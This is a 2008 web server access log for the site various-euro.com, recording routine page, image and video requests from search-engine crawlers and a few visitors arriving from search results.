77.222.14.173 - - [17/Sep/2008:07:03:32 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:32 +0200] "GET /zampa-lovers/zampama2.mpg HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/index.html" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:32 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "http://www.various-euro.com/zampa-lovers/index.html" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:33 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "http://www.various-euro.com/zampa-lovers/index.html" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:33 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 206 499211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:33 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:35 +0200] "GET /zampa-lovers/kralle.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:35 +0200] "GET /zampa-lovers/zampama2.mpg HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:35 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 206 250362 "http://www.various-euro.com/zampa-lovers/" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:36 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:36 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "http://www.various-euro.com/zampa-lovers/" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:36 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:36 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:36 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:36 +0200] "GET /zampa-lovers/kralle.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:37 +0200] "GET /zampa-lovers/zampama2.mpg HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/index.html" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:37 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "http://www.various-euro.com/zampa-lovers/index.html" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:37 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "http://www.various-euro.com/zampa-lovers/index.html" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:38 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:38 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 206 517698 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:40 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 206 513432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:41 +0200] "GET /zampa-lovers/kralle.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:41 +0200] "GET /zampa-lovers/zampama2.mpg HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:42 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 206 17554 "http://www.various-euro.com/zampa-lovers/" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:42 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:42 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:42 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:42 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:43 +0200] "GET /zampa-lovers/kralle.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.222.14.173 - - [17/Sep/2008:07:03:43 +0200] "GET /zampa-lovers/zampama2.mpg HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/index.html" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:43 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "http://www.various-euro.com/zampa-lovers/index.html" "Windows-Media-Player/11.0.5721.5230"
77.222.14.173 - - [17/Sep/2008:07:03:44 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.1.215.165 - - [17/Sep/2008:07:18:17 +0200] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.6.17.186 - - [17/Sep/2008:08:18:51 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.186 - - [17/Sep/2008:08:18:52 +0200] "GET /f-other.html HTTP/1.0" 200 33189 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.36.144.10 - - [17/Sep/2008:08:21:01 +0200] "GET /frame-menu.html HTTP/1.0" 200 10536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.1.215.165 - - [17/Sep/2008:08:22:05 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.1.215.165 - - [17/Sep/2008:08:27:10 +0200] "GET /framez.html HTTP/1.0" 200 3959 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
193.252.149.16 - - [17/Sep/2008:09:08:03 +0200] "GET /neon/large.html HTTP/1.1" 200 1547 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
208.36.144.10 - - [17/Sep/2008:09:08:07 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5418 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.52.143.15 - - [17/Sep/2008:09:13:55 +0200] "GET http://www.various-euro.com:80/robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.15 - - [17/Sep/2008:09:14:10 +0200] "GET /bmpp/euro_pal_1.html HTTP/1.1" 200 18252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
119.63.193.43 - - [17/Sep/2008:09:29:49 +0200] "GET / HTTP/1.1" 200 7869 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)"
89.216.39.62 - - [17/Sep/2008:09:31:37 +0200] "GET /framez-rez.html HTTP/1.1" 200 4323 "http://www.google.com/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla:en-US:official&hs=1KC&q=varius+doo+beograd&start=60&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:37 +0200] "GET /frame-menu.html HTTP/1.1" 200 10536 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:37 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /f-rez.html HTTP/1.1" 200 9765 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /rez/mb.jpg HTTP/1.1" 200 12467 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /rez/ma.jpg HTTP/1.1" 200 12893 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /rez/car.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /rez/tec.gif HTTP/1.1" 200 732 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
89.216.39.62 - - [17/Sep/2008:09:31:38 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
65.214.45.224 - - [17/Sep/2008:09:49:27 +0200] "GET /restate_copy.html HTTP/1.0" 200 97631 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.224 - - [17/Sep/2008:09:49:28 +0200] "GET /menueleiste.js HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
141.83.78.100 - - [17/Sep/2008:09:51:00 +0200] "GET / HTTP/1.0" 200 7869 "-" "-"
64.1.215.165 - - [17/Sep/2008:09:53:11 +0200] "GET /frame-menu.html HTTP/1.0" 200 10536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.6.17.186 - - [17/Sep/2008:11:07:32 +0200] "GET /rez/327.mp3 HTTP/1.0" 200 2771948 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.186 - - [17/Sep/2008:11:11:37 +0200] "GET /partnergegenberlin.html HTTP/1.0" 200 5022 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.91.224.4 - - [17/Sep/2008:11:47:09 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
77.91.224.4 - - [17/Sep/2008:11:47:09 +0200] "GET /framez-rez.html HTTP/1.1" 200 4323 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
64.1.215.165 - - [17/Sep/2008:12:02:32 +0200] "GET /logs/ HTTP/1.0" 200 10079 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.211.174 - - [17/Sep/2008:12:03:18 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.174 - - [17/Sep/2008:12:03:19 +0200] "GET /warez.html HTTP/1.1" 200 9754 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.180 - - [17/Sep/2008:12:05:16 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.180 - - [17/Sep/2008:12:05:16 +0200] "GET /f-warez.html HTTP/1.1" 200 10953 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.180 - - [17/Sep/2008:12:05:18 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.110.163 - - [17/Sep/2008:12:07:25 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://search.live.com/results.aspx?q=various" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
65.55.110.163 - - [17/Sep/2008:12:07:25 +0200] "GET /framez.html HTTP/1.0" 200 3959 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
65.55.110.163 - - [17/Sep/2008:12:07:25 +0200] "GET /style/various-euro.css HTTP/1.0" 200 3437 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
65.55.110.163 - - [17/Sep/2008:12:07:26 +0200] "GET /frame-menu.html HTTP/1.0" 200 10536 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
65.55.110.163 - - [17/Sep/2008:12:07:26 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5418 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
65.55.110.163 - - [17/Sep/2008:12:07:26 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
65.55.110.163 - - [17/Sep/2008:12:07:26 +0200] "GET /style/various-euro.css HTTP/1.0" 200 3437 "http://www.various-euro.com/frame-menu.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
193.252.149.15 - - [17/Sep/2008:12:10:51 +0200] "GET /neon/annniiii.html HTTP/1.1" 200 686 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.16 - - [17/Sep/2008:12:12:32 +0200] "GET /bmpp/18.html HTTP/1.1" 200 4467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
66.249.65.2 - - [17/Sep/2008:12:15:13 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.2 - - [17/Sep/2008:12:15:13 +0200] "GET /logs/usage_200809.html HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.36.144.10 - - [17/Sep/2008:12:21:15 +0200] "GET /restate_copy.html HTTP/1.0" 200 97631 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
193.252.149.16 - - [17/Sep/2008:12:52:39 +0200] "GET /DgH/rampe/index.html HTTP/1.1" 200 2056 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
208.36.144.10 - - [17/Sep/2008:13:03:03 +0200] "GET /your_tour.html HTTP/1.0" 200 31730 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.36.144.10 - - [17/Sep/2008:13:13:17 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.0" 200 2129 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.211.174 - - [17/Sep/2008:13:22:56 +0200] "GET /your_tour.html HTTP/1.1" 200 29760 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
90.157.186.74 - - [17/Sep/2008:13:32:50 +0200] "GET / HTTP/1.1" 302 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:32:50 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:32:50 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:32:50 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:32:50 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:32:50 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:32:53 +0200] "GET /zampa/slike/E8CURATO.GIF HTTP/1.1" 200 15386 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:32:54 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:33:06 +0200] "GET /zampa/slike/E7MEDIAA.GIF HTTP/1.1" 200 44716 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:33:06 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:33:18 +0200] "GET /zampa/slike/E6BIENNI.GIF HTTP/1.1" 200 33736 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:33:19 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:33:34 +0200] "GET /zampa/slike/E1TITEL.GIF HTTP/1.1" 200 16284 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
90.157.186.74 - - [17/Sep/2008:13:33:35 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl-SI; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
64.1.215.165 - - [17/Sep/2008:13:54:10 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.1.215.165 - - [17/Sep/2008:14:11:45 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5418 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.6.17.186 - - [17/Sep/2008:14:15:58 +0200] "GET /f-warez.html HTTP/1.0" 200 10953 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.186 - - [17/Sep/2008:14:22:29 +0200] "GET /sendi_agent.html HTTP/1.0" 200 6213 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.1.215.165 - - [17/Sep/2008:14:48:14 +0200] "GET /f-net.html HTTP/1.0" 200 9913 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.211.171 - - [17/Sep/2008:15:07:12 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.171 - - [17/Sep/2008:15:07:12 +0200] "GET /f-web.html HTTP/1.1" 200 13605 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.36.144.10 - - [17/Sep/2008:15:39:00 +0200] "GET /f-zeug.html HTTP/1.0" 200 45338 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
89.172.24.88 - - [17/Sep/2008:15:50:10 +0200] "GET /bmpp/18.html HTTP/1.1" 200 4467 "http://www.google.hr/search?hl=hr&q=YOU+MUST+BE+18+&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:10 +0200] "GET /bmpp/Bilder/18_01.png HTTP/1.1" 200 1118 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:10 +0200] "GET /bmpp/Bilder/18_02.png HTTP/1.1" 200 289 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_03.png HTTP/1.1" 200 574 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_04.png HTTP/1.1" 200 289 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_05.png HTTP/1.1" 200 407 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_06.png HTTP/1.1" 200 289 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_07.png HTTP/1.1" 200 417 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_08.png HTTP/1.1" 200 289 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_09.png HTTP/1.1" 200 417 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.172.24.88 - - [17/Sep/2008:15:50:11 +0200] "GET /bmpp/Bilder/18_10.png HTTP/1.1" 200 270 "http://www.various-euro.com/bmpp/18.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
